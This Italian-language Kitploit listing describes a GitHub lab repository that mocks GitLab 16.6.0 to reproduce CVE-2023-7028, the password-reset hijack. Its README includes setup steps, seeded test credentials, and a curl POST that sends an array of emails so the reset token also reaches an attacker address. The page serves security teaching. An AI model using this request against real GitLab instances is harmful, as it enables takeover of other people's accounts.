Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
GitLab-CVE-2023-7028 — # Istanza GitLab vulnerabile simulata che riproduce il dirottamento del reset della password CVE-2023-7028 Dimostra lo sfruttamento del parametro email basato su array e il furto dell'account. Solo per uso didattico in laboratorio. | Kitploit
Strumenti/GitHubGitHub/feartheploto/gitlab-cve-2023-7028
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubfeartheploto/gitlab-cve-2023-7028

GitLab-CVE-2023-7028

# Istanza GitLab vulnerabile simulata che riproduce il dirottamento del reset della password CVE-2023-7028 Dimostra lo sfruttamento del parametro email basato su array e il furto dell'account. Solo per uso didattico in laboratorio.

Vedi Repository
720 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

GitLab CVE-2023-7028 — Mock 16.6.0 (solo host)

CVE-2023-7028 (CVSS 10.0): POST /users/password accettava l'array user[email][] — il server trovava l'utente tramite email[0] ma inviava lo stesso token di reset a ogni indirizzo → un attaccante con [email protected] dirotta [email protected]. Interessati: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. Questo mock riproduce il flusso vulnerabile della 16.6.0 (DB JSON, nessun SMTP).

Esecuzione

npm install && npm start → http://127.0.0.1:3000 (oppure PORT=3001 npm start; riprova automaticamente se occupato; solo localhost). Dati preimpostati: [email protected]/s3cur3P@ss!, , in .

[email protected]/BobSecure1!
[email protected]/5iveL!fe
data/users.json

Riproduzione

curl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]" Controlla http://127.0.0.1:3000/mailbox o /api/emails — entrambi ricevono lo stesso token. Apri .../users/password/edit?reset_password_token=TOKEN per prendere il controllo. Normale: user[email][email protected] → una sola mail. La mailbox mostra ogni mail; nulla esce dall'host. MIT — solo laboratorio, non esporre.

Scarica lo strumento